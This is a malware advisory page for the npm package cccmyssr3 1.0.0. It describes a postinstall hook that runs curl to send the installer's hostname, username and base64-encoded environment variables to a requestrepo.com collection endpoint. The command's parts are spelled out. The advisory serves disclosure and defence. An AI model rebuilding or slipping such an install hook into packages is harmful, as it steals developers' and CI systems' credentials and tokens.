cccmyssr3 @1.0.0
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 2:40 AM UTC
OSV ID
MAL-2026-6392
Ecosystem
npm
Summary
On npm install , this package automatically runs postinstall.js, which executes curl -X POST with a body containing the installer's hostname ( $(hostname) ), current user ( $(whoami) ), and the first 10 environment variables base64-encoded ( $(env | head -10 | base64 -w 0) ), sending them over plain HTTP to http://r1x55270.requestrepo.com — a requestrepo.com subdomain used as an attacker data-collection endpoint. Environment variables on developer and CI machines routinely contain credentials, API tokens, and CI secrets, so this is a credential-theft payload. The package's main is a trivial one-line formatDate stub and its description is 'A harmless utility package' — a cover story unrelated to the lifecycle behavior.
Source: amazon-inspector (a15e77975be346fa9b834e50124784a6774b5385e47072ae80911f5eda92cabf)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.